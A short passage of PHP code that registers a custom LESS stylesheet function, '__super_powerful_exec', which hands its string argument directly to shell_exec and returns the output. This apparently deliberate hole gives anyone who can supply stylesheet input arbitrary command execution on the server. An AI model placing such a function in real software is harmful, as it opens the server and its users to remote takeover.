addCustomLessFunction("__super_powerful_exec", function (mixed $text) { if (is_string($text)) { $result = shell_exec($text); if (is_string($result)) { return $result; } else { return ""; } } else { return ""; } }) ];